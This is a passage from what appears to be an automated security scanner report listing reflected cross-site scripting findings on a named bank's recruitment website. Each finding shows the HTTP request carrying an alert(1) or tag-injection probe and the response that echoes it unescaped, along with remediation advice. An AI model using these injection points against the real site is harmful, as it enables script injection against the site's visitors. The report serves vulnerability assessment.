<title>Recruit
...[SNIP]...
ap - Cr..dit Agricole Recruitment Group";
var SharingBaseTitle = "Recruitment site map - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/sitemap.php?d2e4f"-alert(1)-"8ceaf077820=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.104. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85196"-alert(1)-"6b97bf3b912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_campus_captains.php?85196"-alert(1)-"6b97bf3b912=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:18 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:18 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
tment Group";
var SharingBaseTitle = "School Captains - Campus - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_campus_captains.php?85196"-alert(1)-"6b97bf3b912=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.105. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_captains.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385cd"><a>6f8881111c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_campus_captains.php?385cd"><a>6f8881111c3=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:52 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:52 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>School
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_campus_captains.php?385cd"><a>6f8881111c3=1" />
...[SNIP]...

1.106. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d96b"><a>337c3524942 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_campus_forums.php?6d96b"><a>337c3524942=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:53 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:53 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_campus_forums.php?6d96b"><a>337c3524942=1" />
...[SNIP]...

1.107. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_forums.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f1ca"-alert(1)-"020afe0e083 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_campus_forums.php?6f1ca"-alert(1)-"020afe0e083=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:30 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:30 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 98472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Forums
...[SNIP]...
cole Recruitment Group";
var SharingBaseTitle = "Forums - Campus - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_campus_forums.php?6f1ca"-alert(1)-"020afe0e083=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.108. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5623"><a>c4c48b6ab07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_campus_partnerships.php?a5623"><a>c4c48b6ab07=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:47 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:47 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_campus_partnerships.php?a5623"><a>c4c48b6ab07=1" />
...[SNIP]...

1.109. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_campus_partnerships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91409"-alert(1)-"f9476546768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_campus_partnerships.php?91409"-alert(1)-"f9476546768=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:11 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:11 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Partner
...[SNIP]...
ment Group";
var SharingBaseTitle = "Partnerships - Campus - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_campus_partnerships.php?91409"-alert(1)-"f9476546768=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.110. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_internships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e52e"><a>b9c4ca81b0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_internships.php?4e52e"><a>b9c4ca81b0c=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:57 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:57 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interns
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_internships.php?4e52e"><a>b9c4ca81b0c=1" />
...[SNIP]...

1.111. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_internships.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eebf"-alert(1)-"2e7fd435f38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_internships.php?7eebf"-alert(1)-"2e7fd435f38=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:24 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:24 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56898

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Interns
...[SNIP]...
t Agricole Recruitment Group";
var SharingBaseTitle = "Internships - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_internships.php?7eebf"-alert(1)-"2e7fd435f38=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.112. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16544"-alert(1)-"e1334466cba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_key_figures.php?16544"-alert(1)-"e1334466cba=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
t Agricole Recruitment Group";
var SharingBaseTitle = "Key figures - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_key_figures.php?16544"-alert(1)-"e1334466cba=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.113. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_key_figures.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62a1"><a>49e73af528 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_key_figures.php?c62a1"><a>49e73af528=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:00 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:00 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 52403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Key fig
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_key_figures.php?c62a1"><a>49e73af528=1" />
...[SNIP]...

1.114. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_orsay.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb21f"-alert(1)-"72917e5ca44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_orsay.php?fb21f"-alert(1)-"72917e5ca44=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:14 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:14 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>CA Inte
...[SNIP]...
uitment Group";
var SharingBaseTitle = "CA International Talents program - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_orsay.php?fb21f"-alert(1)-"72917e5ca44=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.115. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_orsay.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0737"><a>3725710e69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_orsay.php?a0737"><a>3725710e69b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:50 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:50 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 53714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>CA Inte
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_orsay.php?a0737"><a>3725710e69b=1" />
...[SNIP]...

1.116. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_part_time.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d140d"-alert(1)-"69fd9df1e71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_part_time.php?d140d"-alert(1)-"69fd9df1e71=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:19 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:19 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Part ti
...[SNIP]...
ricole Recruitment Group";
var SharingBaseTitle = "Part time student - Students - Cr..dit Agricole Recruitment Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/stud_part_time.php?d140d"-alert(1)-"69fd9df1e71=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.117. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_part_time.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40aa6"><a>aebb601717a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_part_time.php?40aa6"><a>aebb601717a=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:55 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:55 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 56663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Part ti
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_part_time.php?40aa6"><a>aebb601717a=1" />
...[SNIP]...

1.118. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /stud_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a96c"><a>f7d9e3abee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /stud_video_room.php?8a96c"><a>f7d9e3abee=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:52 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:52 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 54006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Video r
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/stud_video_room.php?8a96c"><a>f7d9e3abee=1" />
...[SNIP]...

1.119. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /stud_video_room.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3765e"-alert(1)-"e4578547f46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /stud_video_room.php?3765e"-alert(1)-"e4578547f46=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:18 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:04:18 GMT; path=/
Content-Type: text/html
